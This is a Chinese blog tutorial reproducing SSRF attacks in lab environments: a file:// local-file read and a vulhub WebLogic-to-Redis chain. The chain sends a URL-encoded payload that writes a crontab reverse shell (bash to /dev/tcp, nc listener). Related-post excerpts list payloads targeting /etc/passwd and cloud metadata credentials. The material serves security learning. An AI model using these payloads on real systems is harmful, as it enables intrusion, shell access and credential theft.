ssrf漏洞之——漏洞复现

最新推荐文章于 2025-10-21 11:55:20 发布
原创 最新推荐文章于 2025-10-21 11:55:20 发布 · 3.2k 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

漏洞介绍
SSRF漏洞:SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造url,由服务端对此url发起请求的一个安全漏洞。
漏洞原理
SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,并且没有对目标地址做过滤与限制,比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。
一般情况下,SSRF访问的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
漏洞危害
1.对外网服务器所在的内网,本地进行端口扫描,获取一些服务的banner信息.
2.攻击运行在内网或本地的应用程序
3.对内网Web应用进行指纹识别
4.识别企业内部的资产信息攻击内外网的Web应用,主要是使用HTTP GET请求就可以实现的攻击(比如strust2,SQli等)
5.利用file协议读取本地文件等
漏洞高危触发点
1.分享:通过URL地址分享网页内容
2.转码服务:通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览
3.在线翻译:通过URL地址翻译对应文本的内容
4.图片加载与下载:通过URL地址加载或下载图片
5.图片、文章收藏功能
漏洞复现
1.利用ssrf漏洞读取本地文件
原理
将页面请求的url改为指定本地文件路径的url
步骤
原url:
http://localhost/XXE-master/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/XXE-master/vul/ssrf/ssrf_info/info1.php
原url执行效果
在这里插入图片描述
修改后的url
http://localhost/XXE-master/vul/ssrf/ssrf_curl.php?url=file:///C:/Users/Administrator/Desktop/1.txt
修改后的url执行效果
在这里插入图片描述
1.txt被显示到页面
2.利用ssrf漏洞攻击内网redis数据库
环境
Redis数据库4.0版本、10.0.x版本的weblogic服务器
原理
利用weblogic服务器的ssrf漏洞发送HTTP请求给Redis数据库,再利用Redis数据库4.0版本内网的未授权访问漏洞getshell
步骤
1.打开Ubuntu虚拟机,安装vulhub漏洞环境
在这里插入图片描述
2.进入vulhub-master/weblogic/ssrf目录,输入docker-compose up -d启动环境
在这里插入图片描述
3.物理机访问 http://192.168.16.131:7001/uddiexplorer/SearchPublicRegistries.jsp,192.168.16.131为vulhub的ip
在这里插入图片描述
4.输入一个值Bp抓包
在这里插入图片描述
5.通过修改post值里的url请求为指定服务器ip,探测内网中的redis服务器ip(通过6379端口检查),http://172.22.0.2:6379成功返回结果
在这里插入图片描述
6.发送三条redis命令,即可将弹shell的脚本写入/etc/crontab,之后将shell发送到指定的ip的一个端口,ip可自己更改,之后在192.168.16.131上使用nc监听4444端口,输入nc -lvvp 4444 开启监听
Url编码后的redis命令:

test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.16.131%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

发送命令:
将url编码后的命令放到redis服务器的ip后(http://172.22.0.2:6379/命令),替换url发送,过一会nc处就会自动弹出一个控制172.22.0.2:6379的shell
在这里插入图片描述
使用nc开启4444端口监听:控制172.22.0.2:6379的shell弹出
在这里插入图片描述

SSRF漏洞复现(redis)
m0_56578216的博客
09-04 619
前提条件:1.安装环境已完成,故此省略不做。
weblogic ssrf 漏洞复现
薛定谔嘚喵博客
05-06 781
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
ssrf漏洞复现
Wincreds的博客
08-25 642
3.给info随便赋一个值,出来了php界面,可以观察到hostname主机和端口,而172.21.0.3是可以绕过127.0.0.1这个条件,我们可以在这个地址上测试,不断的改变端口值,端口不一样,出来的值也会有所区别。2.使用端口访问文件,可以看到有一个过滤条件,它限制了file,dict协议,127.0.0.1和localhost 也不能用,其实就是不想你探测内网端口,也不能读取内网服务文件。6.发现80端口不可用,后续请教同学,经过扫描ip以及分析,得出6379端口也是对外开放,
【网络安全---漏洞复现】shiro550反序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程)
最新发布
2302_76672693的博客
10-21 811
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序序列化就是为了传输遍历,把一个对象类型的数据转换成字符串进行传输;
SSRF漏洞复现
m0_65665796的博客
08-25 841
在这个IP地址下只开放了80端口,那这个时候好像有些束手无策了,但是我们转换思想,为什么不能存在其他ip地址呢,这毕竟是内网,我们便可以探测该网段上存活的主机了,这里我手动探查172.21.0.1,发现这个ip并没有什么反应。但是我们查看/etc/shadow就不可,因为我们的权限不够,那我们使用dict协议看看服务器本地开启了哪些端口,经过测试,发现没有明显的反馈,那我们可以看一下页面返回值,来猜测。172.21.0.3,在这个ip下,出现了不一样的结果,该漏洞需要部署在Linux下,拉取docker。
SSRF漏洞——pikachu
m0_65858385的博客
08-24 1529
综上,SSRF的危害极大,我们在进行代码审计的时候尤其需要注意是否存在file_get_contents()、fsockopen()、curl_exec()、fopen()、readfile()这些函数,这些函数是造成SSRF漏洞的成因之一。而我们预防SSRF漏洞可以从以下三点进行防御:1、限制请求的端口只能为Web端口,只允许访问HTTP和HTTPS的请求。2、限制不能访问内网的IP,以防止对内网进行攻击。3、屏蔽返回的详细信息。
基于SSRF漏洞复现引发的CRLF之(session会话固定+XSS)组合拳利用思路
yuan_boss的博客
09-06 3427
Weblogic SSRF漏洞。其中涉及到了注入HTTP头,利用Redis获得反弹shell,这里引发了我的一些思考,因此我写下了这篇文章。​我的思考主要起源于:为什么我们在SSRF的利用中,使用http协议能对redis直接进行操作?
SSRF漏洞实现
Nirvana92的博客
08-24 912
但是测试他fastcgi的9000端口的时候检测不出来,但是通过看http的response返回值可以知道,就是9000端口,知道是fpm,因为fpm基本上90%都监听在9000端口上。那么接下来就传webshell就可以了,在172.21.0.2的物理路径下传webshell,那么他的物理路径是啥,说实话,不知道,只能猜或者测试。但是结果不尽人意,页面没有如何变化,或许shell.php根本没有写入,也许是我们猜错了或者没有权限(权限太低了),不管怎样,都是没有成功。
weblogic漏洞复现(一)
m0_67170526的博客
04-17 923
weblogic是是Oracle 公司开发的企业级 Java EE(现 Jakarta EE)应用服务器,主要用于部署和管理分布式、高可用的企业级应用。(个人感觉和tomcat差不多)
复现ssrf漏洞
m0_68498873的博客
08-26 722
将生成的payload再次用url进行编码,然后发送过去,然后使用ssrf访问这个内网的upload/shell.php文件得到flag。因为Hostname是172.21.0.3,所以内网中不可能只有一台服务器,通过尝试发现172.18.0.2可能有web服务。2、写入任务计划 --反弹shell可以将服务器权限反弹给攻击者。所以我们也可以用dict来探测内网端口,主要用来探测这几大服务。通过bp扫描目录,发现有个upload目录,访问upload。1、fistcgi --发现后可以是用RCE。
Weblogic SSRF漏洞复现
K_ShenH的博客
06-24 1271
Weblogic SSRF漏洞
Weblogic SSRF漏洞漏洞复现
qq_48744846的博客
04-14 3827
访问http://192.168.43.8:7001/uddiexplorer/,无需登录即可查看 uddiexplorer 应用: SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp,仔细查看发现这里有参数传入的是URL,差不多可以断定就是在这个点存在 SSRF 漏洞了: 在 BurpSuite 下抓包测试该漏洞,查询请求的operator参数可以进行端口探测,当我们输入不同值时可得到...
ssrf漏洞复现pikachu
06-15
### 关于Pikachu SSRF漏洞复现步骤 SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种攻击技术,允许攻击者通过服务器发起恶意构造的HTTP请求。以下是基于Pikachu环境中的SSRF漏洞复现步骤和利用教程: #### 1. 环境搭建 确保已正确安装并配置Pikachu漏洞学习平台。访问相关模块时,请确认以下条件: - 已启用SSRF模块。 - 确保目标服务器能够访问外部网络或本地服务。 #### 2. 分析漏洞点 在Pikachu的SSRF模块中,通常存在一个输入框,用于指定URL地址。该输入框未对用户提交的URL进行严格校验,导致可以构造恶意URL以访问内网资源或其他敏感接口[^4]。 #### 3. 构造恶意URL SSRF漏洞的核心在于构造特殊的URL来绕过限制。常见的测试方法包括: - 访问本地回环地址:`http://127.0.0.1` 或 `http://localhost` - 使用文件协议读取本地文件:`file:///etc/passwd` 或 `file:///C:/Windows/win.ini` - 测试云元数据服务:`http://169.254.169.254/latest/meta-data/`(适用于AWS等环境) 例如,在Pikachu环境中,尝试访问以下URL以验证是否存在SSRF漏洞: ```plaintext http://127.0.0.1:8080/index.php ``` #### 4. 利用漏洞 一旦确认存在SSRF漏洞,可以根据实际需求选择不同的攻击方式: - **读取敏感文件**:通过`file://`协议读取系统文件,如`/etc/passwd`或`C:\Windows\win.ini`。 - **访问内网服务**:尝试连接内网中的其他服务,如数据库、Redis等。 - **获取云元数据**:如果目标服务器运行在云环境中,可以通过访问元数据API获取临时凭证[^4]。 示例代码如下: ```python import requests url = "http://<pikachu-ip>/vul/ssrf/ssrf.php" # 替换为实际URL payload = { "url": "http://127.0.0.1:8080/index.php" # 构造恶意URL } response = requests.post(url, data=payload) print(response.text) ``` #### 5. 验证结果 成功利用SSRF漏洞后,可能会返回以下内容: - 目标服务器上的敏感信息。 - 内网服务的响应数据。 - 云元数据API返回的临时凭证。 --- ### 注意事项 - 在实际操作中,请确保拥有合法授权,避免非法渗透测试。 - 复现漏洞仅限于学习和研究目的,不得用于非法活动。 ---
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值